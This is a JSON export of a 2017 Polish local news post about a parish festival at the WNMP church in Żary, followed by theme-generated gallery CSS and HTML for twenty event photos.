{"id":3884,"date":"2017-06-03T12:36:16","date_gmt":"2017-06-03T10:36:16","guid":{"rendered":"http:\/\/moja24.pl\/?p=3884"},"modified":"2019-04-27T03:21:18","modified_gmt":"2019-04-27T01:21:18","slug":"festyn-parafialny-w-zarach-galeria","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/06\/03\/festyn-parafialny-w-zarach-galeria\/","title":{"rendered":"Festyn parafialny w \u017barach (galeria)"},"content":{"rendered":"<p><strong>Niedzielny festyn parafialny przy Ko\u015bciele WNMP przyci\u0105gn\u0105\u0142 mn\u00f3stwo mieszka\u0144c\u00f3w \u017bar.<\/strong><\/p>\n<p>Proboszcz parafii postara\u0142 si\u0119 aby by\u0142o ciekawie i mi\u0142o. Loteria fantowa, prezentacja sprz\u0119tu wojskowego armii ameryka\u0144skiej, stra\u017cy po\u017carnej, sprz\u0119tu medycznego, malowanie twarzy, zamek dmuchany, grill, domowe ciasta, napoje i koncerty artyst\u00f3w ameryka\u0144skich VON PROMNITZ TOUR uatrakcyjni\u0142y niedzielne popo\u0142udnie na dziedzi\u0144cu przy ko\u015bciele.<\/p>\n<p><em>MK, fot Gola Halina<\/em><\/p>\n\r\n                <style type=\"text\/css\">\r\n                    \r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item1 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item2 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item3 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item4 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item5 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item6 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item7 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item8 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item9 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item10 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item11 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item12 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item13 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item14 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item15 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item16 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item17 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item18 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17-80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item19 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-3--80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                    #td_uid_1_69f497e8574ca  .td-doubleSlider-2 .td-item20 {\r\n                        background: url(https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP--80x60.jpg) 0 0 no-repeat;\r\n                    }\r\n                <\/style>\r\n\r\n                <div id=\"td_uid_1_69f497e8574ca\" class=\"td-slide-on-2-columns\">\r\n                    <div class=\"post_td_gallery\">\r\n                        <div class=\"td-gallery-slide-top\">\r\n                           <div class=\"td-gallery-title\">Festyn parafialny w ko\u015bciele WNMP<\/div>\r\n\r\n                            <div class=\"td-gallery-controls-wrapper\">\r\n                                <div class=\"td-gallery-slide-count\"><span class=\"td-gallery-slide-item-focus\">1<\/span> of 20<\/div>\r\n                                <div class=\"td-gallery-slide-prev-next-but\">\r\n                                    <i class = \"td-icon-left doubleSliderPrevButton\"><\/i>\r\n                                    <i class = \"td-icon-right doubleSliderNextButton\"><\/i>\r\n                                <\/div>\r\n                            <\/div>\r\n                        <\/div>\r\n\r\n                        <div class = \"td-doubleSlider-1 \">\r\n                            <div class = \"td-slider\">\r\n                                \r\n                    <div class = \"td-slide-item td-item1\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29.jpg\" title=\"Festyn Parafialny WNMP 29\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-29.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item2\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30.jpg\" title=\"Festyn Parafialny WNMP 30\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-30.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item3\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28.jpg\" title=\"Festyn Parafialny WNMP 28\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-28.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item4\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33.jpg\" title=\"Festyn Parafialny WNMP 33\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-33.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item5\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32.jpg\" title=\"Festyn Parafialny WNMP 32\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-32.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item6\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31.jpg\" title=\"Festyn Parafialny WNMP 31\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-31.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item7\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27.jpg\" title=\"Festyn Parafialny WNMP 27\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-27.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item8\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25.jpg\" title=\"Festyn Parafialny WNMP 25\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-25.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item9\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24.jpg\" title=\"Festyn Parafialny WNMP 24\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-24.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item10\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26.jpg\" title=\"Festyn Parafialny WNMP 26\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-26.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item11\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP.jpg\" title=\"Festyn Parafialny WNMP\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item12\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23.jpg\" title=\"Festyn Parafialny WNMP 23\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-23.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item13\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22.jpg\" title=\"Festyn Parafialny WNMP 22\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-22.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item14\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21.jpg\" title=\"Festyn Parafialny WNMP 21\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-21.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item15\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20.jpg\" title=\"Festyn Parafialny WNMP 20\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-20.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item16\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19.jpg\" title=\"Festyn Parafialny WNMP 19\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-19.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item17\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18.jpg\" title=\"Festyn Parafialny WNMP 18\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18-768x510.jpg 768w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-18.jpg 960w\" sizes=\"(max-width: 632px) 100vw, 632px\" alt=\"\">\r\n                            <\/a>\r\n                            \r\n                        <\/figure>\r\n                    <\/div>\r\n                    <div class = \"td-slide-item td-item18\">\r\n                        <figure class=\"td-slide-galery-figure td-slide-popup-gallery\">\r\n                            <a class=\"slide-gallery-image-link\" href=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17.jpg\" title=\"Festyn Parafialny WNMP 17\"  data-caption=\"\"  data-description=\"\">\r\n                                <img decoding=\"async\" src=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17-632x420.jpg\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17-632x420.jpg 632w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17-300x199.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/06\/Festyn-Parafialny-WNMP-17-768x510.jpg 768w, 